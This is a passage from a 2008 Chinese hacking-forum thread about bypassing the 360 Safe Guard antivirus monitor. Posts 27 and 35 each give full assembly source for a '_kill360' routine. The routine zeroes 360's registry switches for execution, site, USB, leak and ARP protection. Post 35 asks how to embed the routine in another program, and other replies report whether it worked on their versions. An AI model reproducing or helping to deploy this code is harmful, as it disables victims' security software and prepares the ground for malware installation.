邪恶八进制信息安全团队技术讨论组 » 论坛原创{ Original Paper } » [原创]突破360安全卫士监控

35 ‹‹12

打印

[原创]突破360安全卫士监控

本主题由 sunwear 于 2008-8-19 11:12 关闭

猪来猪去

禁止发言

帖子: 3
精华: 0
积分: 11
阅读权限: 0
性别: 男
在线时间: 1 小时
注册时间: 2008-6-7
最后登录: 2008-6-22

发短消息
加为好友
当前离线

26楼 大中小发表于 2008-6-8 13:17 只看该作者

提示: 作者被禁止或删除内容自动屏蔽

TOP

sding

晶莹剔透§烈日灼然

Rank: 1

帖子: 4
精华: 0
积分: 14
阅读权限: 40
在线时间: 16 小时
注册时间: 2007-5-6
最后登录: 2008-9-24

发短消息
加为好友
当前离线

27楼 大中小发表于 2008-6-12 22:26 只看该作者

最晚看见ASM用汇编实现的部分代码，今天找时没有了
自己来写一个，练练手，学了汇编还没有好好用过，写的很菜，呵呵

.386
.model flat, stdcall
option casemap:none

include windows.inc
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib

_kill360 proto

.data
szPath db 'software\360safe\safemon',0
szKeyName0 db 'ExecAccess',0
szKeyName1 db 'SiteAccess',0
szKeyName2 db 'MonAccess',0
szKeyName3 db 'UDiskAccess',0
szKeyName4 db 'LeakAccess',0
szKeyName5 db 'ARPAccess',0
Data dd 0h
.code
start:
invoke _kill360

_kill360 proc
local hKey:dword
local hsize:dword
local nCode:dword
local pData:dword
mov eax, sizeof dword
mov hsize, eax
invoke RegCreateKey, HKEY_LOCAL_MACHINE, addr szPath, addr hKey
.if eax == ERROR_SUCCESS
invoke RegSetValueEx, hKey, addr szKeyName0, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName1, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName2, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName3, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName4, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName5, NULL, REG_DWORD, addr Data, hsize
invoke RegCloseKey, hKey
.endif
ret
_kill360 endp
end start

TOP

xlrtx

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 43
精华: 0
积分: 3592
阅读权限: 100
性别: 男
来自: 北京
在线时间: 42 小时
注册时间: 2007-5-11
最后登录: 2008-10-11

发短消息
加为好友
当前离线

28楼 大中小发表于 2008-6-14 20:43 只看该作者

搞不懂这么大的问题难道360没考虑过么= =?

'早起的虫儿被鸟吃

TOP

jiayinsong

晶莹剔透§烈日灼然

Rank: 1

帖子: 3
精华: 0
积分: 11
阅读权限: 40
在线时间: 12 小时
注册时间: 2008-6-18
最后登录: 2008-10-13

发短消息
加为好友
当前离线

29楼 大中小发表于 2008-6-18 14:19 只看该作者

思路是不错。。但放在注册表里不安全吧！！

TOP

jiayinsong

晶莹剔透§烈日灼然

Rank: 1

帖子: 3
精华: 0
积分: 11
阅读权限: 40
在线时间: 12 小时
注册时间: 2008-6-18
最后登录: 2008-10-13

发短消息
加为好友
当前离线

30楼 大中小发表于 2008-6-18 14:20 只看该作者

试了。。。没反应呀。。。

TOP

jiayinsong

晶莹剔透§烈日灼然

Rank: 1

帖子: 3
精华: 0
积分: 11
阅读权限: 40
在线时间: 12 小时
注册时间: 2008-6-18
最后登录: 2008-10-13

发短消息
加为好友
当前离线

31楼 大中小发表于 2008-6-18 14:24 只看该作者

不好意思呀。。。有用的。。。。可以关闭的呀。。哈哈！~！~！

TOP

liuliqiao

晶莹剔透§烈日灼然

Rank: 1

帖子: 1
精华: 0
积分: 4
阅读权限: 40
在线时间: 0 小时
注册时间: 2008-7-4
最后登录: 2008-8-18

发短消息
加为好友
当前离线

32楼 大中小发表于 2008-8-12 15:43 只看该作者

很遗憾的告诉大家,测试以失败告终.....360直接无视...

TOP

dayang1717

晶莹剔透§烈日灼然

Rank: 1

帖子: 5
精华: 0
积分: 20
阅读权限: 40
性别: 女
来自: shandong
在线时间: 9 小时
注册时间: 2006-10-7
最后登录: 2008-10-14

发短消息
加为好友
当前离线

33楼 大中小发表于 2008-8-12 21:19 只看该作者

我的是4.2版本的，开的保险箱，修改完注册表后，就直接在360中看到关闭了

safdafda

TOP

eaglet

晶莹剔透§烈日灼然

Rank: 1

帖子: 3
精华: 0
积分: 11
阅读权限: 40
在线时间: 2 小时
注册时间: 2008-8-14
最后登录: 2008-9-2

发短消息
加为好友
当前离线

34楼 大中小发表于 2008-8-15 20:10 只看该作者

如果系统安装瑞星杀毒软件是否还能实现？

因为瑞星有注册表监控，所以做这个更改很难过瑞星吧

TOP

heymo

晶莹剔透§烈日灼然

Rank: 1

帖子: 1
精华: 0
积分: 6
阅读权限: 40
性别: 男
在线时间: 0 小时
注册时间: 2006-3-18
最后登录: 2008-8-16

发短消息
加为好友
当前离线

35楼 大中小发表于 2008-8-16 13:35 只看该作者

.386
.model flat, stdcall
option casemap:none

include windows.inc
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib

_kill360 proto

.data
szPath db 'software\360safe\safemon',0
szKeyName0 db 'ExecAccess',0
szKeyName1 db 'SiteAccess',0
szKeyName2 db 'MonAccess',0
szKeyName3 db 'UDiskAccess',0
szKeyName4 db 'LeakAccess',0
szKeyName5 db 'ARPAccess',0
Data       dd 0h
.code
start:
invoke _kill360

_kill360 proc
      local hKey:dword
      local hsize:dword
      local nCode:dword
      local pData:dword
      mov       eax, sizeof dword
      mov       hsize, eax
      invoke       RegCreateKey, HKEY_LOCAL_MACHINE, addr szPath, addr hKey
      .if       eax == ERROR_SUCCESS
            invoke RegSetValueEx, hKey, addr szKeyName0, NULL, REG_DWORD, addr Data, hsize
            invoke RegSetValueEx, hKey, addr szKeyName1, NULL, REG_DWORD, addr Data, hsize
            invoke RegSetValueEx, hKey, addr szKeyName2, NULL, REG_DWORD, addr Data, hsize
            invoke RegSetValueEx, hKey, addr szKeyName3, NULL, REG_DWORD, addr Data, hsize
            invoke RegSetValueEx, hKey, addr szKeyName4, NULL, REG_DWORD, addr Data, hsize
            invoke RegSetValueEx, hKey, addr szKeyName5, NULL, REG_DWORD, addr Data, hsize
            invoke RegCloseKey, hKey
      .endif
      ret
_kill360 endp
end start

这个怎么能添加到程序里呢?
高手指点一下
这个现在还能用不?

TOP

‹‹ 上一主题 | 下一主题 ››

35 ‹‹12

邪恶八进制信息安全团队技术讨论组 » 论坛原创{ Original Paper } » [原创]突破360安全卫士监控